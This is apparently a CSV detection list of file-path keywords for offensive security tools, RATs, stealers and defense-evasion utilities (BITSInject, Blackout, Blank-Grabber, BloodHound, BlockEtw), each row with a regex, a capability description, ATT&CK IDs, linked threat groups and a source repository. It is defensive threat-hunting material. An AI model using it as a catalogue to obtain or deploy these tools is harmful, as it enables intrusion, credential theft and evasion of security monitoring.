"*/bitcoin-getaddr.nse*",".{0,1000}\/bitcoin\-getaddr\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5673"
"*/bitcoin-info.nse*",".{0,1000}\/bitcoin\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5674"
"*/bitcoinrpc-info.nse*",".{0,1000}\/bitcoinrpc\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5675"
"*/bitsadmin/bitsadmin.cmd*",".{0,1000}\/bitsadmin\/bitsadmin\.cmd.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","5677"
"*/BitsArbitraryFileMove*",".{0,1000}\/BitsArbitraryFileMove.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","5678"
"*/BITSInject.git*",".{0,1000}\/BITSInject\.git.{0,1000}","offensive_tool_keyword","BITSInject","A one-click tool to inject jobs into the BITS queue (Background Intelligent Transfer Service) allowing arbitrary program execution as the NT AUTHORITY/SYSTEM account","T1197","TA0004","N/A","N/A","Privilege Escalation","https://github.com/SafeBreach-Labs/BITSInject","1","1","N/A","N/A","8","1","99","18","2019-08-24T22:02:12Z","2017-07-03T12:39:38Z","5679"
"*/BITSInject.py*",".{0,1000}\/BITSInject\.py.{0,1000}","offensive_tool_keyword","BITSInject","A one-click tool to inject jobs into the BITS queue (Background Intelligent Transfer Service) allowing arbitrary program execution as the NT AUTHORITY/SYSTEM account","T1197","TA0004","N/A","N/A","Privilege Escalation","https://github.com/SafeBreach-Labs/BITSInject","1","1","N/A","N/A","8","1","99","18","2019-08-24T22:02:12Z","2017-07-03T12:39:38Z","5680"
"*/BITSJobPayloads.py*",".{0,1000}\/BITSJobPayloads\.py.{0,1000}","offensive_tool_keyword","BITSInject","A one-click tool to inject jobs into the BITS queue (Background Intelligent Transfer Service) allowing arbitrary program execution as the NT AUTHORITY/SYSTEM account","T1197","TA0004","N/A","N/A","Privilege Escalation","https://github.com/SafeBreach-Labs/BITSInject","1","1","N/A","N/A","8","1","99","18","2019-08-24T22:02:12Z","2017-07-03T12:39:38Z","5681"
"*/bittorrent-discovery.nse*",".{0,1000}\/bittorrent\-discovery\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5682"
"*/bjnp-discover.nse*",".{0,1000}\/bjnp\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5683"
"*/Black-key Spoofer.exe*",".{0,1000}\/Black\-key\sSpoofer\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5684"
"*/Blackout.cpp*",".{0,1000}\/Blackout\.cpp.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","N/A","10","935","137","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z","5685"
"*/Blackout.exe*",".{0,1000}\/Blackout\.exe.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","N/A","10","935","137","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z","5686"
"*/Blackout.git*",".{0,1000}\/Blackout\.git.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","N/A","10","935","137","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z","5687"
"*/Blackout.sln*",".{0,1000}\/Blackout\.sln.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","N/A","10","935","137","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z","5688"
"*/Blackout.sys*",".{0,1000}\/Blackout\.sys.{0,1000}","offensive_tool_keyword","Blackout","kill anti-malware protected processes using BYOVD","T1055 - T1562.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Blackout","1","1","N/A","N/A","N/A","10","935","137","2023-07-21T17:35:09Z","2023-05-25T23:54:21Z","5689"
"*/blackvision.git*",".{0,1000}\/blackvision\.git.{0,1000}","offensive_tool_keyword","blackvision","Command line Remote Access tool (RAT) for Windows.","T1090 - T1095 - T1008","TA0011","N/A","N/A","Malware","https://github.com/quantumcore/blackvision","1","1","N/A","N/A","10","1","14","10","2019-09-16T18:32:51Z","2019-07-04T17:32:35Z","5690"
"*/blackvision_c.cpp*",".{0,1000}\/blackvision_c\.cpp.{0,1000}","offensive_tool_keyword","blackvision","Command line Remote Access tool (RAT) for Windows.","T1090 - T1095 - T1008","TA0011","N/A","N/A","Malware","https://github.com/quantumcore/blackvision","1","0","N/A","N/A","10","1","14","10","2019-09-16T18:32:51Z","2019-07-04T17:32:35Z","5691"
"*/Blank%20Grabber/Extras/hash*",".{0,1000}\/Blank\%20Grabber\/Extras\/hash.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","1","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","5692"
"*/Blank.Grabber.zip*",".{0,1000}\/Blank\.Grabber\.zip.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","1","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","5693"
"*/Blank-Grabber#download*",".{0,1000}\/Blank\-Grabber\#download.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","1","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","5694"
"*/Blank-Grabber.git*",".{0,1000}\/Blank\-Grabber\.git.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","1","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","5695"
"*/BlankOBF.git*",".{0,1000}\/BlankOBF\.git.{0,1000}","offensive_tool_keyword","BlankOBF","BlankOBF is a Python obfuscation tool designed to make Python programs harder to understand","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/Blank-c/BlankOBF","1","1","N/A","N/A","9","2","114","22","2024-12-23T02:53:41Z","2022-01-24T13:52:00Z","5696"
"*/BlankOBF.py*",".{0,1000}\/BlankOBF\.py.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","1","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","5697"
"*/BlankOBFv2.py*",".{0,1000}\/BlankOBFv2\.py.{0,1000}","offensive_tool_keyword","BlankOBF","BlankOBF is a Python obfuscation tool designed to make Python programs harder to understand","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/Blank-c/BlankOBF","1","1","N/A","N/A","9","2","114","22","2024-12-23T02:53:41Z","2022-01-24T13:52:00Z","5698"
"*/blindeventlog.exe*",".{0,1000}\/blindeventlog\.exe.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","1","N/A","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","5699"
"*/blindsight.exe*",".{0,1000}\/blindsight\.exe.{0,1000}","offensive_tool_keyword","blindsight","Red teaming tool to dump LSASS memory, bypassing basic countermeasures","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/0xdea/blindsight","1","1","N/A","N/A","10","3","225","26","2024-12-31T15:28:15Z","2024-07-18T07:35:43Z","5700"
"*/blindsight.git*",".{0,1000}\/blindsight\.git.{0,1000}","offensive_tool_keyword","blindsight","Red teaming tool to dump LSASS memory, bypassing basic countermeasures","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/0xdea/blindsight","1","1","N/A","N/A","10","3","225","26","2024-12-31T15:28:15Z","2024-07-18T07:35:43Z","5701"
"*/Blizzard-RAT lite.exe*",".{0,1000}\/Blizzard\-RAT\slite\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5702"
"*/blob/main/write_anything.c*",".{0,1000}\/blob\/main\/write_anything\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0008","N/A","N/A","Exploitation tool","https://github.com/gyaansastra/CVE-2022-0847","1","1","N/A","N/A","N/A","1","2","2","2022-03-20T15:46:04Z","2022-03-09T15:44:58Z","5703"
"*/block_dll_policy.exe*",".{0,1000}\/block_dll_policy\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","5704"
"*/blocketw.bin*",".{0,1000}\/blocketw\.bin.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","5705"
"*/blocketw.exe*",".{0,1000}\/blocketw\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","5706"
"*/blocketw.exe*",".{0,1000}\/blocketw\.exe.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","5707"
"*/BlockEtw.git*",".{0,1000}\/BlockEtw\.git.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","5708"
"*/BlockEtw/tarball/*",".{0,1000}\/BlockEtw\/tarball\/.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","5709"
"*/BlockEtw/zipball/*",".{0,1000}\/BlockEtw\/zipball\/.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","1","N/A","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","5710"
"*/BlockOpenHandle.git*",".{0,1000}\/BlockOpenHandle\.git.{0,1000}","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","1","N/A","N/A","9","2","167","25","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z","5711"
"*/BloodHound.exe*",".{0,1000}\/BloodHound\.exe.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","5712"
"*/BloodHound.git*",".{0,1000}\/BloodHound\.git.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","1","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","5713"
"*/bloodhound.md*",".{0,1000}\/bloodhound\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","5714"
"*/bloodhound.py*",".{0,1000}\/bloodhound\.py.{0,1000}","offensive_tool_keyword","crackmapexec","bloodhound integration with crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks ","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","5715"
"*/bloodhound/enumeration*",".{0,1000}\/bloodhound\/enumeration.{0,1000}","offensive_tool_keyword","BloodHound","A Python based ingestor for BloodHound","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","1","N/A","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","5716"
"*/bloodhound_domain.py*",".{0,1000}\/bloodhound_domain\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","5717"
"*/bloodhound_domaintrust.py*",".{0,1000}\/bloodhound_domaintrust\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","5718"
"*/bloodhound_gpo.py*",".{0,1000}\/bloodhound_gpo\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","5719"
"*/bloodhound_object.py*",".{0,1000}\/bloodhound_object\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","5720"
"*/bloodhound_ou.py*",".{0,1000}\/bloodhound_ou\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","5721"
"*/bloodhound_schema.py*",".{0,1000}\/bloodhound_schema\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","5722"
"*/bloodhound-data*",".{0,1000}\/bloodhound\-data.{0,1000}","offensive_tool_keyword","BloodHound","A Python based ingestor for BloodHound","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","1","N/A","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","5723"
"*/bloodhound-quickwin.git*",".{0,1000}\/bloodhound\-quickwin\.git.{0,1000}","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/kaluche/bloodhound-quickwin","1","1","N/A","AD Enumeration","6","3","239","26","2025-04-04T05:11:46Z","2021-02-16T16:04:16Z","5724"
"*/bloodhoundsync.py*",".{0,1000}\/bloodhoundsync\.py.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","1","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","5725"
"*/bloodyAD.git*",".{0,1000}\/bloodyAD\.git.{0,1000}","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","N/A","10","10","1590","145","2025-04-10T10:47:16Z","2021-10-11T15:07:26Z","5726"
"*/BluePalmRAT.exe*",".{0,1000}\/BluePalmRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","5727"
"*/bluscreenofjeff/*",".{0,1000}\/bluscreenofjeff\/.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","5728"
